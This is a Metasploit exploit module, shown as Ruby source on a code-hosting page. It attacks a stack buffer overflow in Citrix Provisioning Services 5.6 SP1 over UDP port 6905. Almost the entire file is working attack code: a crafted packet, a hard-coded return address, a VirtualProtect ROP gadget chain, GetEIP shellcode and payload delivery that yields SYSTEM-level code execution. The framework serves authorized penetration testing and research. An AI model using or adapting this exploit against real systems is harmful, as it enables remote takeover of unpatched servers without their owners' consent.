Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a remote buffer overflow in the Citrix Provisioning Services

18
          5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode

19
          0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution

20
          under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2

21
          and Windows XP SP3.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery

26
          'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author

27
          'juan vazquez' # Metasploit module

28
        ],

29
        'References' => [

30
          ['OSVDB', '75780'],

31
          ['BID', '49803'],

32
          ['URL', 'http://support.citrix.com/article/CTX130846'],

33
          ['ZDI', '12-010']

34
        ],

35
        'DefaultOptions' => {

36
          'EXITFUNC' => 'process',

37
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

38
        },

39
        'Payload' => {

40
          'BadChars' => "\x00",

41
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },

42
        },

43
        'Platform' => ['win'],

44
        'Targets' => [

45
          [

46
            'Citrix Provisioning Services 5.6 SP1',

47
            {

48
              'Offset' => 1500,

49
              'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe

50
            }

51
          ]

52
        ],

53
        'Privileged' => true,

54
        'DisclosureDate' => '2011-11-04', # CTX130846 creation date

55
        'DefaultTarget' => 0,

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_options([Opt::RPORT(6905)])

65
  end

66


67
  def exploit

68
    packet = "\x06\x00\x02\x40" # DATA MSG

69
    packet << rand_text_alpha_upper(18)

70
    packet << "\x00\x00\x00\x00"

71
    packet << "\x00\x00\x00\x00" # Length

72
    packet << rand_text_alpha_upper(target['Offset'])

73
    packet << [target.ret].pack('V')

74


75
    rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe

76


77
    rop_gadgets =

78
      [

79
        0x0045b141, # POP EAX; RETN streamprocess.exe

80
        0x1009a1bc, # VirtualProtect()

81
        0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe

82
        0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe

83
        0x004ad0cf, # POP EBP; RETN streamprocess.exe

84
        0x00455d9d, # PUSH ESP; RETN streamprocess.exe

85
        0x00497f5a, # POP EAX; RETN streamprocess.exe

86
        0xfffff9d0, # dwSize

87
        0x00447669, # NEG EAX; RETN streamprocess.exe

88
        0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe

89
        0x00426305, # POP ECX; RETN streamprocess.exe

90
        0x00671fb9, # lpflOldProtect

91
        0x004e41e6, # POP EDI; RETN streamprocess.exe

92
        0x0040f004, # RETN streamprocess.exe

93
        0x00495c05, # POP EAX; RETN streamprocess.exe

94
        0xffffffc0, # flNewProtect

95
        0x0042c79a, # NEG EAX; RETN streamprocess.exe

96
        0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe

97
        0x0045c1fa, # POP EAX; RETN streamprocess.exe

98
        0x90909090, # NOP

99
        0x00435bbe, # PUSHAD; RETN streamprocess.exe

100
      ].pack("V*")

101


102
    packet[338, rop_nop.length] = rop_nop

103
    packet[490, rop_gadgets.length] = rop_gadgets

104
    # Put payload address in ecx

105
    geteip = "\xeb\x03" # jmp short 0x5

106
    geteip << "\x59" # pop ecx

107
    geteip << "\xff\xd1" # call ecx

108
    geteip << "\xe8\xf8\xff\xff\xff" # call to "pop / call"

109
    packet[574, 10] = geteip

110
    packet[584, payload.encoded.length] = payload.encoded

111


112
    print_status("Trying target #{target.name}...")

113


114
    connect_udp

115
    udp_sock.put(packet)

116


117
    handler

118
    disconnect_udp

119
  end

120
end

121


122